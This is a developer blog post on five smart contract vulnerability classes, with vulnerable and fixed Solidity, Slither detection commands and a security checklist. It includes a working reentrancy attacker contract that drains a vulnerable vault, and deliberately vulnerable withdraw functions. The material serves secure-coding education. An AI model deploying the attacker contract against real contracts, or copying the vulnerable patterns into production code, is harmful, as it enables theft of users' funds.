5 Smart Contract Vulnerabilities Every Developer Should Know in 2026
Ahmed Moussa · 2026-05-28 · via DEV Community

Smart contracts manage over $90 billion in total value locked across DeFi protocols. Yet the vulnerability classes that enabled the 2016 DAO hack remain present in production code today.

1. Reentrancy — The Vulnerability That Won't Die

The pattern is simple: your contract sends ETH before updating its own state, and the recipient calls back into your contract while the state is stale, so the same balance is paid out again on every re-entry.

```solidity
// VULNERABLE: the external call runs before the balance is zeroed, so the
// recipient's fallback can call withdraw() again with the same stale balance.
function withdraw() external {
    uint256 amount = balances[msg.sender];
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
    balances[msg.sender] = 0; // Too late!
}

// FIXED: Checks-Effects-Interactions, plus OpenZeppelin's nonReentrant
// modifier as defence in depth.
function withdraw() external nonReentrant {
    uint256 amount = balances[msg.sender];
    balances[msg.sender] = 0; // State update FIRST
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
}
```

Detection: run `slither . --detect reentrancy-eth` on every PR, and inherit OpenZeppelin's ReentrancyGuard so the `nonReentrant` modifier is available on every function that makes an external call.
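To make the attack concrete, here is an attacker contract that drains the vulnerable vault above. This is an added example, not code from the article; it assumes the vault also exposes a `deposit()` function (the article only shows `withdraw()`), and the interface name `IVulnerableVault` is made up for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumed interface of the vulnerable vault: deposit() is not shown in the
// article, but the attacker needs some balance for withdraw() to pay out.
interface IVulnerableVault {
    function deposit() external payable;
    function withdraw() external;
}

contract ReentrancyAttacker {
    IVulnerableVault public immutable vault;
    address public immutable owner;

    constructor(address _vault) {
        vault = IVulnerableVault(_vault);
        owner = msg.sender;
    }

    // Step 1: seed a small balance, then call withdraw() once. The vault
    // sends `amount` to this contract BEFORE zeroing balances[attacker].
    function attack() external payable {
        require(msg.sender == owner, "not owner");
        require(msg.value > 0, "send ETH to seed the balance");
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    // Step 2: the vault's call{value: amount}("") lands here while
    // balances[attacker] is still non-zero, so withdraw() is called again.
    // Stop once the vault can no longer cover another payout, so the final
    // transfer does not revert and unwind the whole chain.
    receive() external payable {
        if (msg.value > 0 && address(vault).balance >= msg.value) {
            vault.withdraw();
        }
    }

    function drain() external {
        require(msg.sender == owner, "not owner");
        payable(owner).transfer(address(this).balance);
    }
}
```

Against the fixed vault, the re-entrant `withdraw()` either reverts on `nonReentrant` or, with Checks-Effects-Interactions alone, finds a zero balance and pays nothing, so the attacker only loses gas.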

2. Oracle Manipulation — When Price Feeds Lie

DeFi protocols that rely on a single-source spot price are vulnerable to flash loan attacks. The attacker borrows, manipulates the AMM price, triggers a liquidation (or an over-valued borrow) at the wrong price, and repays, all in one transaction, so nobody can intervene between the price move and the payout.

Fix: use Chainlink price feeds or a Uniswap V3 TWAP (a 30-minute window is a common choice). Never use `getReserves()` for pricing decisions: the reserve ratio is the pool's state at that instant and a flash loan can move it arbitrarily within the same transaction. Cross-check multiple oracle sources and reject readings that deviate too far from each other.

Euler Finance lost ~$197M in March 2023. That exploit came from a missing liquidity check in its `donateToReserves()` function, which let the attacker push a position into artificial undercollateralization and self-liquidate it, rather than from a manipulated external price feed; the lesson is the same: any code path that changes how collateral is valued needs the same scrutiny as the oracle itself.
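The three consumption patterns side by side in one contract, as an added example that is not part of the article. The interfaces are declared inline (subsets of the real Uniswap and Chainlink ones) so the file compiles without imports; `MAX_FEED_AGE` is an assumed staleness bound that should be set to the feed's documented heartbeat, and the contract and function names are made up for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Inline subsets of the real interfaces so this compiles stand-alone.
interface IUniswapV2Pair {
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
}

interface AggregatorV3Interface {
    function latestRoundData() external view returns (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, uint80 answeredInRound);
}

interface IUniswapV3Pool {
    function observe(uint32[] calldata secondsAgos) external view returns (int56[] memory tickCumulatives, uint160[] memory secondsPerLiquidityCumulativeX128s);
}

contract PriceSources {
    IUniswapV2Pair public immutable pair;         // V2 pool behind the VULNERABLE spot read
    AggregatorV3Interface public immutable feed;  // Chainlink feed for the same asset
    IUniswapV3Pool public immutable pool;         // V3 pool for the TWAP

    uint256 public constant MAX_FEED_AGE = 1 hours;   // assumed; match the feed's heartbeat
    uint32 public constant TWAP_WINDOW = 30 minutes;  // the window the article recommends

    constructor(address _pair, address _feed, address _pool) {
        pair = IUniswapV2Pair(_pair);
        feed = AggregatorV3Interface(_feed);
        pool = IUniswapV3Pool(_pool);
    }

    // VULNERABLE: the reserve ratio is whatever the pool holds at this instant.
    // A flash loan can swap the pool far off market, call into the protocol
    // that reads this, then swap back, all inside one transaction.
    function spotPrice() external view returns (uint256) {
        (uint112 r0, uint112 r1, ) = pair.getReserves();
        return (uint256(r1) * 1e18) / uint256(r0);
    }

    // SAFER: external feed, with the two checks a consumer must not skip.
    function chainlinkPrice() external view returns (uint256) {
        (, int256 answer, , uint256 updatedAt, ) = feed.latestRoundData();
        require(answer > 0, "oracle: non-positive answer");
        require(updatedAt != 0 && block.timestamp - updatedAt <= MAX_FEED_AGE, "oracle: stale answer");
        return uint256(answer);
    }

    // SAFER: arithmetic-mean tick over the last TWAP_WINDOW seconds. Moving it
    // requires holding the pool off-price for the whole window, which a single
    // flash-loan transaction cannot do. Rounding matches Uniswap's OracleLibrary.
    function twapTick() external view returns (int24 avgTick) {
        uint32[] memory secondsAgos = new uint32[](2);
        secondsAgos[0] = TWAP_WINDOW; // start of the window
        secondsAgos[1] = 0;           // now
        (int56[] memory tickCumulatives, ) = pool.observe(secondsAgos);
        int56 delta = tickCumulatives[1] - tickCumulatives[0];
        int56 window = int56(uint56(TWAP_WINDOW));
        avgTick = int24(delta / window);
        if (delta < 0 && (delta % window != 0)) avgTick--; // round toward negative infinity
    }
}
```

The TWAP function returns a tick, not a price; turning it into a quote is what Uniswap's `OracleLibrary.getQuoteAtTick` does. A protocol that uses both sources would compare the feed price with the TWAP-derived quote and refuse to act when they disagree by more than a configured tolerance.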

3. Access Control Failures

Functions like `mint()`, `pause()`, or `setFee()` left public or external without an access-control modifier. Simple oversight, catastrophic impact: anyone can mint unlimited tokens, freeze the contract, or set the fee to 100%.

```solidity
// Use OpenZeppelin AccessControl: only addresses granted MINTER_ROLE may mint
bytes32 public constant MINTER_ROLE = keccak256("MINTER_ROLE");

function mint(address to, uint256 amount) external onlyRole(MINTER_ROLE) {
    _mint(to, amount);
}
```

Detection: `slither . --detect suicidal,unprotected-upgrade` catches unprotected `selfdestruct` paths and upgradeable logic contracts that anyone can initialize. A missing modifier on `mint()` or `setFee()` is a business-logic decision a scanner cannot infer, so also review every state-changing external function by hand and confirm who is meant to call it.
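A fuller version of the snippet above, added here and not taken from the article: the roles are created in the constructor, `pause()` and `setFee()` get the same treatment as `mint()`, and `setFee()` is bounded so even a compromised fee admin cannot set a confiscatory fee. Import paths assume OpenZeppelin Contracts v5 (Pausable moved from `security/` to `utils/` in v5); the token name and `MAX_FEE_BPS` are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {AccessControl} from "@openzeppelin/contracts/access/AccessControl.sol";
import {Pausable} from "@openzeppelin/contracts/utils/Pausable.sol";

contract GuardedToken is ERC20, AccessControl, Pausable {
    bytes32 public constant MINTER_ROLE = keccak256("MINTER_ROLE");
    bytes32 public constant PAUSER_ROLE = keccak256("PAUSER_ROLE");
    bytes32 public constant FEE_ADMIN_ROLE = keccak256("FEE_ADMIN_ROLE");

    uint256 public constant MAX_FEE_BPS = 500; // assumed hard cap: 5%
    uint256 public feeBps;

    // Only DEFAULT_ADMIN_ROLE is granted here; every other role is handed out
    // explicitly by the admin, so the deployer key holds no standing power.
    constructor(address admin) ERC20("Guarded", "GRD") {
        require(admin != address(0), "zero admin");
        _grantRole(DEFAULT_ADMIN_ROLE, admin);
    }

    function mint(address to, uint256 amount) external onlyRole(MINTER_ROLE) {
        _mint(to, amount);
    }

    function pause() external onlyRole(PAUSER_ROLE) {
        _pause();
    }

    function unpause() external onlyRole(PAUSER_ROLE) {
        _unpause();
    }

    // Role-gated AND bounded: the cap limits the damage of a leaked fee-admin key.
    function setFee(uint256 newFeeBps) external onlyRole(FEE_ADMIN_ROLE) {
        require(newFeeBps <= MAX_FEE_BPS, "fee above cap");
        feeBps = newFeeBps;
    }

    // OZ v5 routes every transfer, mint and burn through _update, so pausing
    // here halts all token movement in one place.
    function _update(address from, address to, uint256 value) internal override whenNotPaused {
        super._update(from, to, value);
    }
}
```

Splitting the roles matters: a minting key in a hot wallet for an automated bridge should not also be able to pause the token or change fees, and `DEFAULT_ADMIN_ROLE` belongs behind a multisig or timelock.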

4. Integer Overflow in Unchecked Blocks

Solidity 0.8+ reverts on arithmetic overflow and underflow, but `unchecked` blocks disable that check. Developers use them for gas savings and reintroduce the pre-0.8 bugs.

Rule: only use `unchecked` for loop counter increments and similar arithmetic where overflow is provably impossible. Never for user-controlled inputs.
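The distinction in working code, as an added example that is not from the article: a user-controlled subtraction that `unchecked` turns into a silent underflow, the checked version of the same function, and the one loop-counter use that is safe. The contract and function names are made up for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract UncheckedPitfalls {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // VULNERABLE: `amount` is user-controlled. When amount > balance the
    // subtraction wraps to a value near 2**256 instead of reverting, so a
    // caller with a zero balance can request the contract's entire ETH
    // balance, receive it, and keep a huge "balance" for next time.
    function withdrawUnsafe(uint256 amount) external {
        unchecked {
            balances[msg.sender] -= amount; // silent underflow
        }
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // FIXED: checked arithmetic; amount > balance reverts with Panic(0x11).
    // State is still updated before the external call (Checks-Effects-Interactions).
    function withdrawSafe(uint256 amount) external {
        balances[msg.sender] -= amount; // reverts on underflow
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // ACCEPTABLE: `i < len` bounds i below type(uint256).max, so `++i` cannot
    // overflow and the check is pure gas. The running total stays checked,
    // because nothing bounds the sum of arbitrary balances.
    function totalOf(address[] calldata holders) external view returns (uint256 total) {
        uint256 len = holders.length;
        for (uint256 i = 0; i < len; ) {
            total += balances[holders[i]];
            unchecked {
                ++i;
            }
        }
    }
}
```

The `grep -rn unchecked contracts/` line from the checklist below is the right first pass: every hit should be a loop counter or arithmetic with a proof in the comment, and anything that touches a function argument or storage written by users is a finding.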

5. Cross-Chain Message Verification

Bridge exploits produced the largest DeFi losses: Ronin ($624M, 2022), Wormhole ($326M, 2022), Nomad ($190M, 2022).

Every cross-chain message receiver needs 5 checks:

  1. Caller is the bridge contract
  2. Source chain is allowed
  3. Sender is trusted on that chain
  4. Replay protection (message hash dedup)
  5. Payload bounds validation
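A receiver that implements all five checks, as an added example that is not part of the article. The callback signature is assumed; real bridges (CCIP, LayerZero, Axelar and others) each define their own, but the five checks are the same whichever one delivers the message. The contract name, the single-admin setup, the fixed `(address, uint256)` payload and `MAX_AMOUNT_PER_MESSAGE` are all assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract CrossChainReceiver {
    address public immutable bridge;  // check 1: the only address allowed to deliver messages
    address public immutable admin;   // configures routes; assumed single admin for brevity

    mapping(uint64 => bool) public allowedSourceChain;   // check 2
    mapping(uint64 => bytes32) public trustedSender;     // check 3: one trusted sender per chain
    mapping(bytes32 => bool) public consumed;            // check 4: message hash dedup
    mapping(address => uint256) public credited;         // the effect of a valid message

    uint256 public constant MAX_AMOUNT_PER_MESSAGE = 1_000_000 * 1e18; // assumed cap
    uint256 public constant PAYLOAD_LEN = 64;                         // abi.encode(address, uint256)

    event MessageHandled(bytes32 indexed messageId, uint64 indexed sourceChain, address to, uint256 amount);

    constructor(address _bridge, address _admin) {
        require(_bridge != address(0) && _admin != address(0), "zero address");
        bridge = _bridge;
        admin = _admin;
    }

    // Routes are allow-listed explicitly. An unset mapping slot reads as zero,
    // so the receive path must never accept zero as a valid sender.
    function setRoute(uint64 sourceChain, bytes32 sender, bool allowed) external {
        require(msg.sender == admin, "not admin");
        allowedSourceChain[sourceChain] = allowed;
        trustedSender[sourceChain] = sender;
    }

    function receiveMessage(
        uint64 sourceChain,
        bytes32 sender,
        uint64 nonce,
        bytes calldata payload
    ) external {
        // 1. Caller is the bridge contract.
        require(msg.sender == bridge, "caller not bridge");

        // 2. Source chain is allowed.
        require(allowedSourceChain[sourceChain], "source chain not allowed");

        // 3. Sender is the trusted counterpart on that chain, and not the zero sentinel.
        require(sender != bytes32(0) && sender == trustedSender[sourceChain], "untrusted sender");

        // 4. Replay protection: the id binds chain, sender, nonce and payload,
        //    and is marked consumed BEFORE anything is credited.
        bytes32 messageId = keccak256(abi.encode(sourceChain, sender, nonce, payload));
        require(!consumed[messageId], "replayed message");
        consumed[messageId] = true;

        // 5. Payload bounds: exact length first, then field validation after decoding.
        require(payload.length == PAYLOAD_LEN, "bad payload length");
        (address to, uint256 amount) = abi.decode(payload, (address, uint256));
        require(to != address(0), "zero recipient");
        require(amount > 0 && amount <= MAX_AMOUNT_PER_MESSAGE, "amount out of bounds");

        credited[to] += amount;
        emit MessageHandled(messageId, sourceChain, to, amount);
    }
}
```

The ordering is deliberate: the cheap identity checks run first, the replay marker is written before any effect, and the payload is only decoded once its length is known, so a malformed message cannot reach the credit step.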

Security Checklist

| Check | Tool |
| --- | --- |
| Reentrancy | `slither . --detect reentrancy-eth` |
| Access control | `slither . --detect suicidal,unprotected-upgrade`, plus manual review of every state-changing external function |
| Unchecked blocks | `grep -rn unchecked contracts/` |
| Oracle usage | Search for `getReserves` calls |
| All detectors | `slither .` (Slither runs every detector when `--detect` is omitted) |

The most effective defense combines automated scanning on every commit, formal verification for critical functions, and manual audit before mainnet.

If you are looking for automated security scanning for your codebase, check out our free security audit API — 10 free scans per month, returns structured vulnerability reports with severity and remediation guidance.